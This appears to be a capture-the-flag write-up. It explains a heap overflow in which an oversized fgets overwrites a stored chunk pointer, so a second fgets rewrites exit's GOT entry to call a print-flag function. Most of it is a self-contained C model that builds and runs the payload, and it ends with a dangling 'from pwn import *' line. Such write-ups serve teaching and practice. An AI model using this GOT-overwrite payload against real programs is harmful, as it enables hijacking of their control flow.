The program mallocs four chunks, laid out as in the figure above. The first and third chunks each hold a pointer: the first points to the second chunk, the third to the fourth. It then calls fgets twice, using the two stored pointers as destinations. The first fgets reads far more than the second chunk can hold, so the overflow runs into the third chunk and overwrites the pointer stored there, which the program only reads afterwards as the destination of the second fgets. Pointing that pointer at the GOT entry of exit and sending the address of the embedded print-flag function as the second line turns the program's final call to exit into a call to the print-flag function, which gives us the flag.
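To make the mechanics concrete, here is an added C model of that layout and of the two-line payload; it is not the challenge binary or the author's exploit. It assumes four malloc(16) chunks (0x20 bytes each, 24 usable), a function named print_flag standing in for the embedded flag printer, a fake GOT entry for exit placed at 0x10000000 (assumed free; a page-aligned static array is the fallback), and constructed stdin supplied through fmemopen. Because the model runs as a PIE process, the two addresses in the payload are randomised, so the payload builder refuses any address containing 0x0a, which fgets would treat as end of line; print_flag is page-aligned so its low bytes can never be 0x0a.

```c
/* Added model of the four-chunk overflow; assumptions are noted inline. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* A glibc chunk as it sits in memory: size field, then user data; the next
   chunk's prev_size is also usable by this one while it is in use. */
struct chunk { uint64_t prev_size; uint64_t size; char data[16]; };

static struct chunk heap[4];            /* four adjacent 0x20-byte chunks (assumed) */
static int flag_printed;

/* Stand-in for the embedded print-flag function (name assumed).  Page alignment
   keeps the two low address bytes 0x00, so neither can be '\n'. */
__attribute__((aligned(4096))) static void print_flag(void) { flag_printed = 1; }
static void real_exit(void) { }         /* normal exit path, a no-op in the model */

/* Stand-in for exit's GOT entry.  CTF binaries are usually non-PIE with a fixed
   GOT; we mimic that with a mapping at 0x10000000 (assumed free). */
static void (*fallback_got[512])(void) __attribute__((aligned(4096)));
static void (**got_exit)(void);

static void setup(void) {
    if (!got_exit) {
        void *p = mmap((void *)0x10000000, 4096, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == (void *)0x10000000) got_exit = p;
        else { if (p != MAP_FAILED) munmap(p, 4096); got_exit = fallback_got; }
    }
    *got_exit = real_exit;
    flag_printed = 0;
    memset(heap, 0, sizeof heap);
    for (int i = 0; i < 4; i++) heap[i].size = 0x21;        /* 0x20 | PREV_INUSE */
    char *p2 = heap[1].data, *p4 = heap[3].data;
    memcpy(heap[0].data, &p2, sizeof p2);                   /* chunk 1 -> chunk 2 */
    memcpy(heap[2].data, &p4, sizeof p4);                   /* chunk 3 -> chunk 4 */
}

/* The challenge's logic: two fgets through the stored pointers with a size far
   beyond a chunk's 24 usable bytes.  The second pointer is loaded only after
   the first fgets, which is what makes it attacker-controlled. */
static void vuln(FILE *in) {
    char *dst1, *dst2;
    memcpy(&dst1, heap[0].data, sizeof dst1);
    fgets(dst1, 64, in);                                    /* overflows chunk 2 into chunk 3 */
    memcpy(&dst2, heap[2].data, sizeof dst2);               /* now attacker-controlled */
    fgets(dst2, 64, in);
    (*got_exit)();                                          /* exit(), via the GOT */
}

/* The two lines the exploit sends.  Returns their length, or -1 if either
   address contains 0x0a, which fgets would take as end of line. */
static int build_payload(unsigned char *out, size_t cap) {
    uintptr_t target = (uintptr_t)got_exit, value = (uintptr_t)print_flag;
    if (memchr(&target, '\n', sizeof target) || memchr(&value, '\n', sizeof value))
        return -1;
    if (cap < 16 + 8 + 8 + 8 + 1 + 8 + 1) return -1;
    unsigned char *p = out;
    uint64_t size = 0x21;
    memset(p, 'A', 16); p += 16;                /* chunk 2's own 16 data bytes */
    memset(p, 'B', 8);  p += 8;                 /* chunk 3's prev_size: still usable space */
    memcpy(p, &size, 8); p += 8;                /* keep chunk 3's size field intact */
    memcpy(p, &target, 8); p += 8;              /* overwrite the pointer in chunk 3 */
    *p++ = '\n';                                /* end of line 1; fgets adds a NUL after it */
    memcpy(p, &value, 8); p += 8;               /* line 2: new value for exit's GOT entry */
    *p++ = '\n';                                /* "\n\0" spills into the next GOT slot */
    return (int)(p - out);
}

/* 1 if print_flag ran, 0 if exit ran normally, -1 if the payload cannot be sent. */
static int run_exploit(void) {
    unsigned char payload[64];
    setup();
    int n = build_payload(payload, sizeof payload);
    if (n < 0) return -1;
    FILE *in = fmemopen(payload, (size_t)n, "r");           /* constructed stdin */
    if (!in) return -1;
    vuln(in);
    fclose(in);
    return flag_printed;
}

/* Same program on well-formed input: both lines fit their chunks, exit runs. */
static int run_benign(void) {
    char input[] = "hello\nworld\n";                        /* constructed stdin */
    setup();
    FILE *in = fmemopen(input, sizeof input - 1, "r");
    if (!in) return -1;
    vuln(in);
    fclose(in);
    return flag_printed;
}

int main(void) {
    int r = run_exploit();
    puts(r == 1 ? "exit() went to print_flag" :
         r == 0 ? "exit() ran normally" : "payload not deliverable through fgets");
    return r == 1 ? 0 : 1;
}
```

Two details carry over to the real target. The first line must preserve chunk 3's size field on its way to the pointer, otherwise a later malloc or free may abort before exit is ever called; and the second fgets writes "\n\0" after the eight address bytes, clobbering the low bytes of whatever GOT entry follows exit, which is harmless only if nothing else is called through that entry afterwards.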
from pwn import *